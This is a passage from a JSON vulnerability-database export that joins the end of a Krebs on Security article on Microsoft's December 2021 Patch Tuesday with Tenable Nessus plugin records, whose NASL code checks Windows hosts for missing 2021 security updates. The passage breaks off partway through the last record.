Immersive Labs, said [CVE-2021-43905](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43905>) stands out of this month's patch batch.\n\n"Not only for its high [CVSS score](<https://www.techtarget.com/searchsecurity/definition/CVSS-Common-Vulnerability-Scoring-System>) of 9.6, but also because it\u2019s noted as 'exploitation more likely'," Breen observed.\n\nMicrosoft also patched [CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>), an elevation of privilege vulnerability in Windows Installer.\n\n"This appears to be a fix for a patch bypass of [CVE-2021-41379](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41379>), another elevation of privilege vulnerability in Windows Installer that was reportedly fixed in November," **Satnam Narang** of Tenable points out. "However, researchers discovered that fix was incomplete, and a proof-of-concept was made public late last month."\n\nGoogle issued five security fixes for **Chrome**, including one rated critical and three others with high severity. If you\u2019re browsing with Chrome, keep a lookout for when you see an \u201cUpdate\u201d tab appear to the right of the address bar. If it\u2019s been a while since you closed the browser, you might see the Update button turn from green to orange and then red. Green means an update has been available for two days; orange means four days have elapsed, and red means your browser is a week or more behind on important updates. Completely close and restart the browser to install any pending updates.\n\nAlso, Adobe issued patches to correct more than 60 security flaws in [a slew of products,](<https://helpx.adobe.com/security.html>) including Adobe Audition, Lightroom, Media Encoder, Premiere Pro, Prelude, Dimension, After Effects, Photoshop, Connect, Experience Manager and Premiere Rush.\n\nStandard disclaimer: Before you update Windows, _please_ make sure you have backed up your system and/or important files. It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has some [built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nIf you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a decent chance other readers have experienced the same and may chime in here with useful tips.\n\nAdditional reading:\n\n[SANS ISC listing](<https://isc.sans.edu/forums/diary/Microsoft+December+2021+Patch+Tuesday/28132/>) of each Microsoft vulnerability patched today, indexed by severity and affected component.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-12-14T22:23:44", "type": "krebs", "title": "Microsoft Patch Tuesday, December 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-43883", "CVE-2021-43890", "CVE-2021-43905"], "modified": "2021-12-14T22:23:44", "id": "KREBS:4CBEC9501222521F7CCF1D5ECAD51297", "href": "https://krebsonsecurity.com/2021/12/microsoft-patch-tuesday-december-2021-edition/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-18T15:32:36", "description": "The remote Windows host is missing security update 5005095 or cumulative update 5005090. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-34533, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484, CVE-2021-36927)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005095: Windows Server 2008 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005095.NASL", "href": "https://www.tenable.com/plugins/nessus/152425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152425);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-36927\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005095\");\n script_xref(name:\"MSKB\", value:\"5005090\");\n script_xref(name:\"MSFT\", value:\"MS21-5005095\");\n script_xref(name:\"MSFT\", value:\"MS21-5005090\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005095: Windows Server 2008 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005095\nor cumulative update 5005090. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-34533, CVE-2021-36936, CVE-2021-36937,\n CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484,\n CVE-2021-36927)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005095-security-only-update-a324fdbb-ce90-4c4d-8d9d-e9f2f2a57e0e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?de72daa6\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005090-monthly-rollup-8feea9cd-25f9-41ef-b8e1-815211dc4e6c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?910509c6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005095 or Cumulative Update KB5005090.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005095',\n '5005090'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005095, 5005090])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:35:01", "description": "The remote Windows host is missing security update 5007246 or cumulative update 5007263. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42287, CVE-2021-42291)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007246: Windows Server 2008 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38666", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007246.NASL", "href": "https://www.tenable.com/plugins/nessus/154983", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154983);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38666\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007246\");\n script_xref(name:\"MSKB\", value:\"5007263\");\n script_xref(name:\"MSFT\", value:\"MS21-5007246\");\n script_xref(name:\"MSFT\", value:\"MS21-5007263\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007246: Windows Server 2008 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007246\nor cumulative update 5007263. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377,\n CVE-2021-41379, CVE-2021-42278, CVE-2021-42282,\n CVE-2021-42283, CVE-2021-42287, CVE-2021-42291)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007246\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007246 or Cumulative Update KB5007263.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-38666\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007246', '5007263');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007246, 5007263])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:35:01", "description": "The remote Windows host is missing security update 5007233 or cumulative update 5007236. It is, therefore, affected by multiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007233: Windows 7 and Windows Server 2008 R2 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007233.NASL", "href": "https://www.tenable.com/plugins/nessus/154984", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154984);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007233\");\n script_xref(name:\"MSKB\", value:\"5007236\");\n script_xref(name:\"MSFT\", value:\"MS21-5007233\");\n script_xref(name:\"MSFT\", value:\"MS21-5007236\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0053\");\n\n script_name(english:\"KB5007233: Windows 7 and Windows Server 2008 R2 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007233\nor cumulative update 5007236. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41367, CVE-2021-41370, CVE-2021-41377,\n CVE-2021-41379, CVE-2021-42278, CVE-2021-42282,\n CVE-2021-42283, CVE-2021-42285, CVE-2021-42287,\n CVE-2021-42291)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007233\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007233 or Cumulative Update KB5007236.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007233', '5007236');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007233, 5007236])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:06", "description": "The remote Windows host is missing security update 5005089 or cumulative update 5005088. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-34533, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005089: Windows 7 and Windows Server 2008 R2 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-34537", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-08-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005089.NASL", "href": "https://www.tenable.com/plugins/nessus/152436", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152436);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/30\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-34535\",\n \"CVE-2021-34537\",\n \"CVE-2021-36927\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n script_xref(name:\"MSKB\", value:\"5005036\");\n script_xref(name:\"MSKB\", value:\"5005088\");\n script_xref(name:\"MSKB\", value:\"5005089\");\n script_xref(name:\"MSFT\", value:\"MS21-5005036\");\n script_xref(name:\"MSFT\", value:\"MS21-5005088\");\n script_xref(name:\"MSFT\", value:\"MS21-5005089\");\n\n script_name(english:\"KB5005089: Windows 7 and Windows Server 2008 R2 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005089\nor cumulative update 5005088. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484,\n CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-34533, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005089-security-only-update-28805642-8266-40f9-a2be-9003329f661c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?383d9541\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005088-monthly-rollup-69ec750d-30ee-4cbd-82eb-0b1ec2fd5f78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7d931097\");\n # https://support.microsoft.com/en-us/topic/kb5005036-cumulative-security-update-for-internet-explorer-august-10-2021-621b1edb-b461-4d99-ae3e-5add55e53895\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fe73cef\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005089 or Cumulative Update KB5005088.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n 